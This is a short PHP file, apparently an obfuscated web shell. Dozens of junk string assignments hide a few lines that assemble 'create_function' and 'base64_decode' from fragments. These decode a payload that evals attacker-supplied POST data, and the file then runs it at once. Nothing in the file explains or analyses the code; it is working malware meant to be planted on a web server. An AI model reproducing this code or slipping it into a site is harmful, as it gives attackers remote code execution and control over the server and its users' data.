<?php
$s = $s.substr("str_ren3B",0,6);
$sa0d = stripos("yvr7fkwrsn","sa0d");
$s = $s.substr("a65cdgs98placecYe97",9,5);
$n8w8 = trim("a0bti7yl6vtk");
$x = $x.substr("QGV2YWwoJFvFVV",0,10);
$bp = ltrim("m3rxoqmp6mrw");
$b4 = $b4.substr("base6",0,5);
$a3j = rtrim("no94ic9vxylir");
$g = $g.$s("pd","","crepdapd");
$qv9i = rtrim("fdp5fcgp7rcukoolmv");
$x = $x.$s("wgby","","9QwgbyT1NUwgbyWwgbyywgby");
$kv = ltrim("jue14euu3ybope0gee3");
$b4 = $b4.$s("im","","4_de");
$vby = ltrim("cpyh20wf3ai1p");
$g = $g.$s("gFTo","","tegFTo_funcgFTotigFToongFTo");
$u7x = trim("jv8h7hw7ltb5k2r");
$x = $x.substr("lRf1n9dmOG",6,4);
$ywy = str_split("insiifhap8kis",6);
$b4 = $b4.$s("kq","","code");
$beem = rtrim("x1ku16c018");
$x = $x.$s("xe4","","9iexe4W");
$pc = strlen("ysbqed4msaso91n");
$x = $x.substr("r49xuZms3srGUlY",3,6);
$egug = ltrim("rn7d532qyr3");
$x = $x.$s("gX2","","eXgX2R1");
$xpd = str_split("bwd69iococ",6);
$x = $x.$s("m1","","cm13YnX");
$jo = trim("wabe2auwgcexcho");
$x = $x.$s("i3tk","","Sk7");
$xhw = trim("yhm0kxkdf2k5");
$qm = $g("", $b4($x));
$wxd = ltrim("sbgpp1ulhg7i");
$y0w = ltrim("chj0lbfnd0qkt5");
$e0xn = stripos("e9yp7cbqyvghmd02","e0xn");
$yyj = strlen("k2updx0ryf6r61");$qm();
$wdx = rtrim("qubq4u2f9w8x6");
function r2(   $eJ){};
$i9 = strlen("nhu52qjl5olimj");
$emwk = stripos("s3dy27sqp2k8flhvkm","emwk");
$ucc = str_split("md6a66yohv",9);
$s4b = strlen("gcvlb8plfbrlusv");
$aur3 = stripos("qhhy9ss2g0x76luws","aur3");
$f5mw = str_split("k23tmhga0v65dd6rl6p",6);
?>